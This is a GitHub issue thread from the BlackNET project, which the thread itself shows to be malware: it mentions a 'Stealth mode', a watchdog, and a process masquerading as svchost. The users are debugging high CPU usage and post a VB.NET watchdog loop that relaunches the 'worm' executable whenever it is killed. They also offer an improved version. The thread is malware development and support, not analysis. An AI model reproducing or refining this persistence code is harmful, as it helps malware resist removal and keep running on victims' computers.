### ISSUE TITLE
Stealth with Watchdog

### ISSUE THREAD

**Issue by panpansh** [BlackHacker511/BlackNET#51]
(Windows 10 x64)
I select Stealth mode and Watchdog here my tasks : 
![1](https://user-images.githubusercontent.com/790586/73703384-fb920400-46ef-11ea-8ba0-159c96bb1bff.PNG) 
First we can see heavy cpu for svchost. 
 
When I end Assistant => svchost and Assistant restart ok. 
When I end svchost => +1 svchost each time you end one. 
![2](https://user-images.githubusercontent.com/790586/73703784-6859ce00-46f1-11ea-809c-080dbc26a22f.PNG) 
(here try to end svchost 2 times) 
![3](https://user-images.githubusercontent.com/790586/73703992-ffbf2100-46f1-11ea-9808-088efe506a75.PNG) 
(here I can end each svchosts.exe)

The bug is maybe from watchdog side.
Wishing you a good day dear @BlackHacker511

**Comment by panpansh** [comment]
We need to review this part for heavy cpu maybe from ProcessWatcher : 
```VB
Private Sub WatcherDeamon()
        On Error Resume Next
        Dim st As Integer = +1
        Do While st <> 2
            If Process.GetProcessesByName(GetWorm()).Length > 0 Then

            Else
                Process.Start(WormPath() & "\" & GetWorm() & ".exe")
            End If
        Loop
    End Sub
```

**Comment by BlackHacker511** [comment]
i will look into it.

**Comment by panpansh** [comment]
I will look today when Im back to home :pray:

**Comment by BlackHacker511** [comment]
The issue is resolved and the fix will be on v3.0

**Comment by panpansh** [comment]
Hey dear @BlackHacker511 my new version is not using hard coded loop.
I can post the two files moded somewhere if you want to test it.
This way can be more proper.
Let me know
